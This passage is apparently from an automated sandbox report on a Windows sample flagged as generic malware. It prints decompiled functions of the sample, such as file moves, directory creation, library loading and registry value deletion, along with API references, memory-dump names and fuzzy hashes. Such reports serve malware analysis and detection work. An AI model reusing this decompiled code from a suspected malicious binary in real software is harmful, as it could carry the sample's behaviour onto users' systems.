                                                              				return 0;
                                                              			}










                                                              0x00402434
                                                              0x00402434
                                                              0x00402437
                                                              0x0040243a
                                                              0x00402476
                                                              0x0040247b
                                                              0x00000000
                                                              0x0040243c
                                                              0x0040243e
                                                              0x00402443
                                                              0x00402447
                                                              0x0040292e
                                                              0x0040292e
                                                              0x0040244d
                                                              0x0040245d
                                                              0x0040245f
                                                              0x0040247d
                                                              0x0040247f
                                                              0x00000000
                                                              0x00402485
                                                              0x0040247f
                                                              0x00402447
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteValue
                                                              • String ID:
                                                              • API String ID: 2831762973-0
                                                              • Opcode ID: 0cca38afaa8380f0ac61552768d3dc96408867fd1b16d355a372d399741288c6
                                                              • Instruction ID: 27a137a867c600d8965633a271772258b7302ea9b92edfc7e4bdeed26dcbc29b
                                                              • Opcode Fuzzy Hash: 0cca38afaa8380f0ac61552768d3dc96408867fd1b16d355a372d399741288c6
                                                              • Instruction Fuzzy Hash: 54F06272A04120EBDB11ABB89B4DAAD72A9AF44354F15443BE141B71C0DAFC5D05866E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableShow
                                                              • String ID:
                                                              • API String ID: 1136574915-0
                                                              • Opcode ID: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                              • Instruction ID: 74d914ea4967392a65d1c9fdd8f91c6329c2dde8704c14122971abf6b6e16597
                                                              • Opcode Fuzzy Hash: 153ab9e6739f7f886f4c830da5bbd0037cfdcbd629ab714a5d97d12cd43f86c5
                                                              • Instruction Fuzzy Hash: 14E0D872908201CFE705EBA4EE485AD73F0EF40315710097FE401F11D0DBB54C00862D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00401573(void* __ebx) {
                                                              				int _t4;
                                                              				void* _t9;
                                                              				struct HWND__* _t11;
                                                              				struct HWND__* _t12;
                                                              				void* _t16;
                                                              
                                                              				_t9 = __ebx;
                                                              				_t11 =  *0x429230;
                                                              				if(_t11 != __ebx) {
                                                              					ShowWindow(_t11,  *(_t16 - 0x2c)); // executed
                                                              					_t4 =  *(_t16 - 0x30);
                                                              				}
                                                              				_t12 =  *0x429244;
                                                              				if(_t12 != _t9) {
                                                              					ShowWindow(_t12, _t4); // executed
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t16 - 4));
                                                              				return 0;
                                                              			}








                                                              0x00401573
                                                              0x00401573
                                                              0x00401581
                                                              0x00401587
                                                              0x00401589
                                                              0x00401589
                                                              0x0040158c
                                                              0x00401594
                                                              0x0040159c
                                                              0x0040159c
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 6e42f6c78eca4588dce9c075aa62587ec70203647e7e96efeb23ba61638e0b3d
                                                              • Instruction ID: 7576989b042b157cf48fac083b749515e454fc9aff443d668f7e93ddc69dec41
                                                              • Opcode Fuzzy Hash: 6e42f6c78eca4588dce9c075aa62587ec70203647e7e96efeb23ba61638e0b3d
                                                              • Instruction Fuzzy Hash: 5DE08676B10114EBCB15DBA8EE9086EB3A5FB44310750487FE502B3290D6759C05CB3C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406A35(signed int _a4) {
                                                              				struct HINSTANCE__* _t5;
                                                              				signed int _t10;
                                                              
                                                              				_t10 = _a4 << 3;
                                                              				_t8 =  *(_t10 + 0x40a410);
                                                              				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                              				if(_t5 != 0) {
                                                              					L2:
                                                              					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                              				}
                                                              				_t5 = E004069C5(_t8); // executed
                                                              				if(_t5 == 0) {
                                                              					return 0;
                                                              				}
                                                              				goto L2;
                                                              			}





                                                              0x00406a3d
                                                              0x00406a40
                                                              0x00406a47
                                                              0x00406a4f
                                                              0x00406a5b
                                                              0x00000000
                                                              0x00406a62
                                                              0x00406a52
                                                              0x00406a59
                                                              0x00000000
                                                              0x00406a6a
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                              • String ID:
                                                              • API String ID: 2547128583-0
                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                              • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                              				signed int _t5;
                                                              				void* _t6;
                                                              
                                                              				_t5 = GetFileAttributesW(_a4); // executed
                                                              				asm("sbb ecx, ecx");
                                                              				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                              				return _t6;
                                                              			}





                                                              0x0040615c
                                                              0x00406169
                                                              0x0040617e
                                                              0x00406184

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe,80000000,00000003), ref: 0040615C
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406133(WCHAR* _a4) {
                                                              				signed char _t3;
                                                              				signed char _t7;
                                                              
                                                              				_t3 = GetFileAttributesW(_a4); // executed
                                                              				_t7 = _t3;
                                                              				if(_t7 != 0xffffffff) {
                                                              					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                              				}
                                                              				return _t7;
                                                              			}





                                                              0x00406138
                                                              0x0040613e
                                                              0x00406143
                                                              0x0040614c
                                                              0x0040614c
                                                              0x00406155

                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                              • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                              • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405C16(WCHAR* _a4) {
                                                              				int _t2;
                                                              
                                                              				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                              				if(_t2 == 0) {
                                                              					return GetLastError();
                                                              				}
                                                              				return 0;
                                                              			}




                                                              0x00405c1c
                                                              0x00405c24
                                                              0x00000000
                                                              0x00405c2a
                                                              0x00000000

                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                              • GetLastError.KERNEL32 ref: 00405C2A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                              • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                              • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: b715351df300c3b20efdb402725ffada51478de355b373ab2a480993b2e23667
                                                              • Instruction ID: 2a6b45b731d435874a857d2ef267d13e5738e3e3b36de2fcc48e8d54155a1bce
                                                              • Opcode Fuzzy Hash: b715351df300c3b20efdb402725ffada51478de355b373ab2a480993b2e23667
                                                              • Instruction Fuzzy Hash: 19513874634796CFCF31EE6488A4BEA73A6AF41360F58836ECC488B252D37595C1CB12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 28%
                                                              			E6F672B98(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				void* _t28;
                                                              				void* _t29;
                                                              				int _t33;
                                                              				void* _t37;
                                                              				void* _t40;
                                                              				void* _t45;
                                                              				void* _t49;
                                                              				signed int _t56;
                                                              				void* _t61;
                                                              				void* _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t77;
                                                              				intOrPtr _t79;
                                                              				intOrPtr _t80;
                                                              				void* _t81;
                                                              				void* _t87;
                                                              				void* _t88;
                                                              				void* _t89;
                                                              				void* _t90;
                                                              				intOrPtr _t93;
                                                              				intOrPtr _t94;
                                                              
                                                              				if( *0x6f675050 != 0 && E6F672ADB(_a4) == 0) {
                                                              					 *0x6f675054 = _t93;
                                                              					if( *0x6f67504c != 0) {
                                                              						_t93 =  *0x6f67504c;
                                                              					} else {
                                                              						E6F6730C0(E6F672AD5(), __ecx);
                                                              						 *0x6f67504c = _t93;
                                                              					}
                                                              				}
                                                              				_t28 = E6F672B09(_a4);
                                                              				_t94 = _t93 + 4;
                                                              				if(_t28 <= 0) {
                                                              					L9:
                                                              					_t29 = E6F672AFD();
                                                              					_t72 = _a4;
                                                              					_t79 =  *0x6f675058;
                                                              					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                              					 *0x6f675058 = _t72;
                                                              					E6F672AF7();
                                                              					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
                                                              					 *0x6f675034 = _t33;
                                                              					 *0x6f675038 = _t79;
                                                              					if( *0x6f675050 != 0 && E6F672ADB( *0x6f675058) == 0) {
                                                              						 *0x6f67504c = _t94;
                                                              						_t94 =  *0x6f675054;
                                                              					}
                                                              					_t80 =  *0x6f675058;
                                                              					_a4 = _t80;
                                                              					 *0x6f675058 =  *((intOrPtr*)(E6F672AFD() + _t80));
                                                              					_t37 = E6F672AE9(_t80);
                                                              					_pop(_t81);
                                                              					if(_t37 != 0) {
                                                              						_t40 = E6F672B09(_t81);
                                                              						if(_t40 > 0) {
                                                              							_push(_t40);
                                                              							_push(E6F672B14() + _a4 + _v8);
                                                              							_push(E6F672B1E());
                                                              							if( *0x6f675050 <= 0 || E6F672ADB(_a4) != 0) {
                                                              								_pop(_t88);
                                                              								_pop(_t45);
                                                              								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                              								if(__eflags == 0) {
                                                              								}
                                                              								asm("loop 0xfffffff5");
                                                              							} else {
                                                              								_pop(_t89);
                                                              								_pop(_t49);
                                                              								 *0x6f67504c =  *0x6f67504c +  *(_t89 + _t49) * 4;
                                                              								asm("loop 0xffffffeb");
                                                              							}
                                                              						}
                                                              					}
                                                              					_t107 =  *0x6f675058;
                                                              					if( *0x6f675058 == 0) {
                                                              						 *0x6f67504c = 0;
                                                              					}
                                                              					E6F672B42(_t107, _a4,  *0x6f675034,  *0x6f675038);
                                                              					return _a4;
                                                              				}
                                                              				_push(E6F672B14() + _a4);
                                                              				_t56 = E6F672B1A();
                                                              				_v8 = _t56;
                                                              				_t77 = _t28;
                                                              				_push(_t68 + _t56 * _t77);
                                                              				_t70 = E6F672B26();
                                                              				_t87 = E6F672B22();
                                                              				_t90 = E6F672B1E();
                                                              				_t61 = _t77;
                                                              				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                              					_push( *((intOrPtr*)(_t70 + _t61)));
                                                              				}
                                                              				_push( *((intOrPtr*)(_t87 + _t61)));
                                                              				asm("loop 0xfffffff1");
                                                              				goto L9;
                                                              			}

























                                                              0x6f672ba8
                                                              0x6f672bb9
                                                              0x6f672bc6
                                                              0x6f672bda
                                                              0x6f672bc8
                                                              0x6f672bcd
                                                              0x6f672bd2
                                                              0x6f672bd2
                                                              0x6f672bc6
                                                              0x6f672be3
                                                              0x6f672be8
                                                              0x6f672bee
                                                              0x6f672c32
                                                              0x6f672c32
                                                              0x6f672c37
                                                              0x6f672c3c
                                                              0x6f672c42
                                                              0x6f672c44
                                                              0x6f672c4a
                                                              0x6f672c57
                                                              0x6f672c59
                                                              0x6f672c5e
                                                              0x6f672c6b
                                                              0x6f672c7e
                                                              0x6f672c84
                                                              0x6f672c8a
                                                              0x6f672c8b
                                                              0x6f672c91
                                                              0x6f672c9d
                                                              0x6f672ca3
                                                              0x6f672cab
                                                              0x6f672cac
                                                              0x6f672caf
                                                              0x6f672cba
                                                              0x6f672cbc
                                                              0x6f672cc8
                                                              0x6f672cce
                                                              0x6f672cd6
                                                              0x6f672d02
                                                              0x6f672d03
                                                              0x6f672d05
                                                              0x6f672d09
                                                              0x6f672d09
                                                              0x6f672d10
                                                              0x6f672ce6
                                                              0x6f672ce6
                                                              0x6f672ce7
                                                              0x6f672cf5
                                                              0x6f672cfe
                                                              0x6f672cfe
                                                              0x6f672cd6
                                                              0x6f672cba
                                                              0x6f672d12
                                                              0x6f672d19
                                                              0x6f672d1b
                                                              0x6f672d1b
                                                              0x6f672d34
                                                              0x6f672d42
                                                              0x6f672d42
                                                              0x6f672bf9
                                                              0x6f672bfa
                                                              0x6f672bff
                                                              0x6f672c03
                                                              0x6f672c08
                                                              0x6f672c1c
                                                              0x6f672c1d
                                                              0x6f672c1e
                                                              0x6f672c20
                                                              0x6f672c25
                                                              0x6f672c27
                                                              0x6f672c27
                                                              0x6f672c2a
                                                              0x6f672c30
                                                              0x00000000

                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000), ref: 6F672C57
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 32082594fc8cf0c62b6d01634c1ab94073e4a255fd096bcd83e5e0fccb0eda3c
                                                              • Instruction ID: 588f955a719273593fde21245f41d9d86cbc0c0de1784c5115c71ebfc0213075
                                                              • Opcode Fuzzy Hash: 32082594fc8cf0c62b6d01634c1ab94073e4a255fd096bcd83e5e0fccb0eda3c
                                                              • Instruction Fuzzy Hash: 13418071904714DFDF34DF69D985B9937B4EB56328F2085AAE804CA140DF38B8918FA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 934eb859930da907b7801b330cdbbbbce5313be6e1d9705f9ccca57565cbf4a9
                                                              • Instruction ID: 793bcf23269d4122d036bc24e4703ad2fa26a2f5943446b3d735fb18d3fc8355
                                                              • Opcode Fuzzy Hash: 934eb859930da907b7801b330cdbbbbce5313be6e1d9705f9ccca57565cbf4a9
                                                              • Instruction Fuzzy Hash: B721E57466038A9FCF30EF148D54BEE37A6AF95790F90412DEC498B204D3715A81CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(2B8EA5CF), ref: 032C1354
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_32b0000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 94d6cde89ab30d2f548376df133532e08b4288048c5189891b75e86b2a06db8b
                                                              • Instruction ID: 83c3561e6069a6882f4b7c6e88efb1b5fe10e7db9d15ee516f81319f6f062c06
                                                              • Opcode Fuzzy Hash: 94d6cde89ab30d2f548376df133532e08b4288048c5189891b75e86b2a06db8b
                                                              • Instruction Fuzzy Hash: 3201C4B466078B9FCF30EE448D55FEE36A6AF91794F50412DDC088B204D371A981CA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 70%
                                                              			E0040167B() {
                                                              				int _t7;
                                                              				void* _t13;
                                                              				void* _t15;
                                                              				void* _t20;
                                                              
                                                              				_t18 = E00402DA6(0xffffffd0);
                                                              				_t16 = E00402DA6(0xffffffdf);
                                                              				E00402DA6(0x13);
                                                              				_t7 = MoveFileW(_t4, _t5); // executed
                                                              				if(_t7 == 0) {
                                                              					if( *((intOrPtr*)(_t20 - 0x28)) == _t13 || E0040699E(_t18) == 0) {
                                                              						 *((intOrPtr*)(_t20 - 4)) = 1;
                                                              					} else {
                                                              						E00406428(_t15, _t18, _t16);
                                                              						_push(0xffffffe4);
                                                              						goto L5;
                                                              					}
                                                              				} else {
                                                              					_push(0xffffffe3);
                                                              					L5:
                                                              					E00401423();
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t20 - 4));
                                                              				return 0;
                                                              			}







                                                              0x00401684
                                                              0x0040168d
                                                              0x0040168f
                                                              0x00401696
                                                              0x0040169e
                                                              0x004016aa
                                                              0x0040292e
                                                              0x004016be
                                                              0x004016c0
                                                              0x004016c5
                                                              0x00000000
                                                              0x004016c5
                                                              0x004016a0
                                                              0x004016a0
                                                              0x004022f1
                                                              0x004022f1
